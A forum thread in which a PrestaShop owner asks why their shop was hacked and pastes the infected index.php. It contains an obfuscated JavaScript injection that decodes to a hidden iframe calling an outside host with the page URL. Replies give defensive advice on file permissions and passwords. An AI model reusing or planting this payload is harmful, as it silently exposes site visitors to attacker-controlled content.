Stefanf90 Posted October 8, 2010 Share Posted October 8, 2010 My Prestashop was hacked some days ago this code was added on the index.php: <?php include(dirname(__FILE__).'/config/config.inc.php'); if(intval(Configuration::get('PS_REWRITING_SETTINGS')) === 1) $rewrited_url = __PS_BASE_URI__; include(dirname(__FILE__).'/header.php'); $smarty->assign('HOOK_HOME', Module::hookExec('home')); $smarty->display(_PS_THEME_DIR_.'index.tpl'); include(dirname(__FILE__).'/footer.php'); ?> <!--Injection_head[sessionId=42562BEB,version=2.0,type=FindDomainName,CRC32=1400A8C8]-->[removed]var uid = '414300', path='VwsdBA8OFhxdDBwICxsHBxoCCkEcBUEXDQ0eAA04EBsfBUEOFgsXEUAXEB8=', host=String.fromCharCode(100,108,45,115,101,114,118,46,99,111,109);[removed][removed]var PyST41 = "e"; eval("var SNmr81 = /k"+"ok"+"o11/i"+"g"); var nBwJ82 = "%"; var HPHb31 = "koko1164koko116Fkoko1163koko1175koko116Dkoko1165koko116Ekoko1174koko112Ekoko1162koko116Fkoko1164koko1179koko112Ekoko1169koko116Ekoko116Ekoko1165koko1172koko1148koko1154koko114Dkoko114Ckoko113Dkoko1164koko116Fkoko1163koko1175koko116Dkoko1165koko116Ekoko1174koko112Ekoko1162koko116Fkoko1164koko1179koko112Ekoko1169koko116Ekoko116Ekoko1165koko1172koko1148koko1154koko114Dkoko114Ckoko1120koko112Bkoko1120koko1127koko113Ckoko1169koko1166koko1172koko1161koko116Dkoko1165koko1120koko1173koko1172koko1163koko113Dkoko1122koko1168koko1174koko1174koko1170koko113Akoko112Fkoko112Fkoko1127koko112Bkoko1168koko116Fkoko1173koko1174koko112Bkoko1127koko112Fkoko1172koko1165koko1163koko1169koko1165koko1176koko1165koko1172koko112Ekoko1170koko1168koko1170koko113Fkoko1175koko1169koko1164koko113Dkoko1127koko112Bkoko1175koko1169koko1164koko112Bkoko1127koko1126koko1170koko1161koko1174koko1168koko113Dkoko1127koko112Bkoko1170koko1161koko1174koko1168koko112Bkoko1127koko1126koko1168koko1172koko1165koko1166koko113Dkoko1127koko112Bkoko116Ckoko116Fkoko1163koko1161koko1174koko1169koko116Fkoko116Ekoko112Ekoko1168koko1172koko1165koko1166koko112Bkoko1127koko1122koko1120koko1173koko1174koko1179koko116Ckoko1165koko1120koko113Dkoko1120koko1122koko1164koko1169koko1173koko1170koko116Ckoko1161koko1179koko113Akoko116Ekoko116Fkoko116Ekoko1165koko1122koko1120koko113Ekoko113Ckoko112Fkoko1169koko1166koko1172koko1161koko116Dkoko1165koko113Ekoko1127koko113B"; var tpsH92 = document.createElement("script"); tpsH92.type = "text/javascript"; tpsH92.text = window["un"+PyST41+"sc"+"ap"+PyST41+""](HPHb31["r"+""+PyST41+"p"+"lac"+PyST41](SNmr81,nBwJ82)); document.body["app"+PyST41+"ndChild"](tpsH92); [removed]<!--Injection_tail[sessionId=42562BEB]--> You see at the last line that there is a code injection. Does anyone know how this could happen? What do I've to fix at my shop so this never happens again? Link to comment Share on other sites More sharing options...
rocky Posted October 9, 2010 Share Posted October 9, 2010 Are you using chmod 777 permissions? Those permissions are unsafe and allow anyone to modify your files. You should use chmod 755 for directories and chmod 644 for files to prevent the files being modified by an unauthorised person. Link to comment Share on other sites More sharing options...
jhnstcks Posted October 9, 2010 Share Posted October 9, 2010 You should also change all your passwords for cpanel, ftp back office, and also any passwords for your pc.Most security breachs occur because your pc has been infected by some kind of virus or trojan and they then access your ftp through your password. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now